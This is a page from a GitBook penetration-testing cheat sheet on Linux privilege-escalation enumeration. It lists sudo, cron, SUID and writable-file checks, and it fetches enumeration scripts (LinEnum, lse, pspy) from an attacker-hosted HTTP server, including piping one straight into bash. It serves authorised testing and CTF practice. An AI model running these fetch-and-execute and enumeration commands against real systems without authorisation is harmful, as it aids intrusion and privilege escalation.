Pentest
  • Homepage
  • Pentest Links
  • 01 Prep
    • Target Inventory
    • OSINT and Dorks
    • Recon-ng dns zone snoop
    • ❤️Gitbook
  • 02 Scan
    • *Favorites
    • Burp
    • Dirb nikto wpscan etc
    • Enum Finger and Brute SSH
    • Fuzzing
    • Nmap
    • Open Port Checks OneLiner
    • Port Knocking
    • SSL Issues
    • Tcpdump
  • 03 Getting In
    • Char Evasion Tricks
    • Email SMTP
    • Eternal Blue
    • FTP
    • heartbleed
    • Metasploit
    • MySql
    • NFS
    • Oracle
    • Postgres
    • PowerShell Empire
    • Shells
    • rpc
    • SMB Samba
    • SSH Tips
    • SQLite3
    • Veil
  • 04 WebApps
    • Apache
    • Blogs
    • Coldfusion
    • Content Management (CMS)
    • Drupal
    • Elastix FreePBX
    • HttpFileServer (HFS)
    • IIS
    • IIS6 WebDav
    • Local File Inclusion (LFI)
    • Magento
    • Nagios
    • PFSense
    • php
    • php type juggling
    • phpLite
    • Web Injections
    • Javascript
    • Shellshock
    • SQL Injections (sqli)
    • SQLMap
    • WAF
    • Webmin
    • Web Scrape
    • Wordpress
  • 05 Passwords & Ciphers
    • Cipher Decrypt
    • Cipher RSA Wiener P-Q-E
    • Cracking
    • Dict Guess List Mangle
    • Get Hashes
    • Hydra Brutes
    • Images Exif Steg
    • Malware Analysis
    • Pull Hashes PCredz
    • SSH PrivKey Passphrase
    • Unzip Crack
    • Windows PW
  • 06 Linux PrivEsc
    • 1 Look Around
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • binaries
    • Buffer Overflow
    • bash prison
    • Monitor Files
    • mongodb node
    • Pivots
    • Remote Execute
    • Shell TTY Fix
    • TAR backups
    • Transfer Files
    • vnc
  • 07 Windows PrivEsc
    • 1 Windows cmd kungfu
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • Bloodhound
    • DLL Hijack MSF
    • Kerberos
    • Memory Analysis
    • NTDS
    • Powershell
    • Responder
    • Saved Creds runas
Powered by GitBook
On this page
  • Start
  • LinEnum
  • Linux Smart Enumeration
  • PsPy32
  • Timers
  • Tools
  • REFS
  • Bonus Enums:
  • SUID/SGID
  • Writeable
  • Enumeration Plan

Was this helpful?

  1. 06 Linux PrivEsc

2 Enums

Previous1 Look AroundNext3 PrivEsc

Last updated 2 years ago

Was this helpful?

Start

sudo -l
crontab -l
ps auxww
uname -a
find / -type f -a (-perm -u+s -o -perm -g+s ) -exec ls -l {} ; 2> /dev/null

pspy   ..snoop processes
find / -type f -user www-data 2>/dev/null    ..files
find / -type d -user www-data 2>/dev/null    ..dirs

LinEnum

  • Extracts large amount of target bits

  • Could find ports listening on localhost, that might have port-knocking or pivots

  • Used by IPPSec

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
cp /opt/LinEnum/LinEnum.sh .
python -m SimpleHTTPServer 80

cd /dev/shm/   ..ramdisk (data wont actually save to disk)
cd /tmp        ..optional (way i've been doing it)

curl $MyIP:8000/LinEnum.sh -t | bash       ..Easy execute and Thorough
curl $MyIP:8000/LinEnum.sh -o LinEnum.sh   ..Download

LinEnum.sh -h                         ..help
LinEnum.sh -k password -e export -t   ..keyword, export, thorough
wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh;chmod 700 lse.sh
lse.sh -h         ..help
lse.sh -l 1 -i    ..level 1.. i to not prompt-pass
lse.sh -l 2 -i    ..level 2.. print everything

PsPy32

  • Snoop on processes/crons without needing root permissions.

  • Even finds root-crontabs

Copy it to the system with:
chmod +x pspy32
python -m SimpleHTTPServer 80
wget http://10.10.14.34/pspy32
> ./pspy32
> ./pspy --help

Timers

  • Kinda like crons

systemctl list-timers
watch -n 1 'systemctl list-timers'

Tools

REFS

Bonus Enums:

SUID/SGID

find / -type f -a (-perm -u+s -o -perm -g+s ) -exec ls -l {} ; 2> /dev/null

Writeable

cd /var/www/html/webservices/monstra/
find . -writable -ls

Enumeration Plan

  1. Check your id, whoami

  2. Linux Smart Enumeration (lse) with increasing levels

    1. lse

    2. lse -l 1

    3. lse -l 2

  3. LinEnum and other scripts

  4. If they are failing, run them manually

    1. Or Check other cheatsheets

    2. https://blog.g0tmi1k.com/..linux-privilege-escalation

  5. Check common file

    1. /var/backup

    2. /var/logs

    3. /tmp

    4. /home/user/.*history

Try easy ones first:

  1. sudo, cron, suid

  2. root processes, enumerate version, check exploits

  3. internal ports you can forward to your-remote-machine

Harder:

  1. Re-read your enums, look for oddities

  2. Unusual file-systems (not ext,swap,tmpfs)

  3. Strange usernames

  4. Kernel exploits

REF:

Get the tools.zip from , and save them as a toolset

https://github.com/rebootuser/LinEnum
Linux Smart Enumeration
https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy32
https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
LookAround
AutoRecon-Tib3rius
linted/linuxprivchecker
AlessandroZ/BeRoot
pentestmonkey/unix-privesc-check
FingerEnums
procmon
UdemyClass